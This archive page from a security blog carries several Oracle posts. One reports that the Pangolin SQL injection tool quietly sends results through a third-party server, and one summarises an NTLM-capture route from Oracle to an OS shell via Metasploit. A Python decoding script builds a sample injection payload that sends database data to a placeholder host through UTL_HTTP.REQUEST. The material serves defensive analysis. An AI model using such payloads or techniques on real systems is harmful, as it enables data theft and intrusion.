Showing posts with label Oracle. Show all posts

Friday, May 8, 2009

Pangolin and your data

This will be a brief entry about a dubious behavior of Pangolin (an SQL injection tool). Today we were checking some of Pangolin's features, and I was particularly interested in the Oracle UTL_HTTP injection. I checked the options and there was no setting for a local HTTP server, so I was wondering how the hell they got the results back.

So I started Pangolin against a test server, and no port was open on my machine. Next, my coworker Javi launched the attack and sniffed the traffic: the whole injection was URL-encoded plus Oracle CHR() encoding. After decoding it we found that the results of the injection are sent to a nosec.org web server, and Pangolin then performs a GET to retrieve the data. WTH?

At least let the user know what you are doing with the data. I don't think this will make penetration testers happy, knowing that their customers' data is traveling via a third-party server.

Be careful where you send your data ;)
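The decoding step above (URL decoding, then resolving Oracle's CHR(n)||CHR(m) string building) is easy to automate so you can see where a tool's payload actually sends your data. The following Python script is an added example, not code from the original post or from Pangolin: the captured request is constructed here with a placeholder collector host (collector.example) and an assumed UTL_HTTP.REQUEST call shape, purely to show the decoding and host extraction.

```python
"""Decode a captured SQL-injection request that is URL-encoded and builds
its string literals with Oracle CHR()||CHR(), then list the hosts it contacts."""
import re
from urllib.parse import quote, unquote

CHR_CALL = re.compile(r"CHR\((\d+)\)", re.IGNORECASE)
# A run of CHR(n) calls joined with || represents one string literal.
CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.IGNORECASE)
URL_IN_SQL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def oracle_chr_encode(text: str) -> str:
    """Build the CHR(n)||CHR(m)... form that tools use to avoid quote characters."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def decode_chr_runs(sql: str) -> str:
    """Replace every CHR()||CHR() run with the quoted literal it represents."""
    def to_literal(match: re.Match) -> str:
        chars = "".join(chr(int(n)) for n in CHR_CALL.findall(match.group(0)))
        return "'" + chars.replace("'", "''") + "'"
    return CHR_RUN.sub(to_literal, sql)


def decode_request(param_value: str) -> str:
    """URL-decode one parameter value, then resolve the CHR() encoding."""
    return decode_chr_runs(unquote(param_value))


def external_hosts(decoded_sql: str) -> list[str]:
    """Hostnames of every URL the decoded statement would contact, in order."""
    hosts: list[str] = []
    for url in URL_IN_SQL.findall(decoded_sql):
        host = url.split("//", 1)[1].split("/", 1)[0].split(":", 1)[0]
        if host not in hosts:
            hosts.append(host)
    return hosts


# Constructed capture (not real traffic): the injected statement pushes a
# query result out through UTL_HTTP.REQUEST to a collector host. The host
# name is a placeholder, and the exact call shape is assumed for illustration.
_COLLECTOR_URL = "http://collector.example/receive?d="
_PAYLOAD_SQL = (
    "1 AND 1=(SELECT LENGTH(UTL_HTTP.REQUEST("
    + oracle_chr_encode(_COLLECTOR_URL)
    + "||(SELECT banner FROM v$version WHERE ROWNUM=1))) FROM dual)"
)
CAPTURED_QUERY = "id=" + quote(_PAYLOAD_SQL, safe="")


def analyse_capture(query_string: str) -> tuple[str, list[str]]:
    """Take a 'name=value' query string and return (decoded SQL, contacted hosts)."""
    value = query_string.split("=", 1)[1]
    sql = decode_request(value)
    return sql, external_hosts(sql)


if __name__ == "__main__":
    sql, hosts = analyse_capture(CAPTURED_QUERY)
    print(sql)
    print("contacts:", hosts)
```

Run it against the sniffed request parameter instead of the constructed one and the `contacts` list tells you which hosts the tool is shipping results to, which is exactly the check that would have revealed the third-party server here.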

-CMM

Saturday, April 11, 2009

From Oracle to the OS with Metasploit

I'm back from my vacation, and it's time to write some new posts.

I read an interesting article on how to obtain a shell through an Oracle database. The article was written by Alexandr Polyakov from www.dsecrg.com; they have more interesting material about Oracle penetration testing on their website.

The article explains how to obtain an OS shell via the pass-the-hash technique from inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to make the database read a file over the network via SMB (ctxsys.context), so that it connects to a fake SMB server and the NTLM challenge-response can be captured.

The author also describes a Metasploit plugin (ora_ntlm_stealer) that automates the process; you can get it by updating your SVN copy.

Here is the paper with the complete information.

Enjoy

-CMM

Tuesday, December 9, 2008

Oracle Forensics


Hi, this time I will post a brief entry about Oracle forensics. When we talk about Oracle forensics we are talking about David Litchfield, who has researched and developed tools for analyzing Oracle from the forensic point of view.

Next Thursday he will participate in a Black Hat webinar, where he will specifically talk about Orablock:

"The tool, orablock, allows a forensic investigator to dump data from a "cold" Oracle data file - i.e. there's no need to load up the data file in the database which would cause the data file to be modified, so using orablock preserves the evidence."

You can register here.

He will also publish a book about Oracle forensics very soon; you can pre-order it at Amazon. The book is called "Oracle Forensics Using Quisix".

And if you want to check all his presentations and papers on the subject, you can go here.

There are few people working in this field; besides Litchfield we can refer to Paul M. Wright, author of the first Oracle forensics book. You can check his blog here.

Enjoy!
-CMM

Wfuzz 2.2.0 released

I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...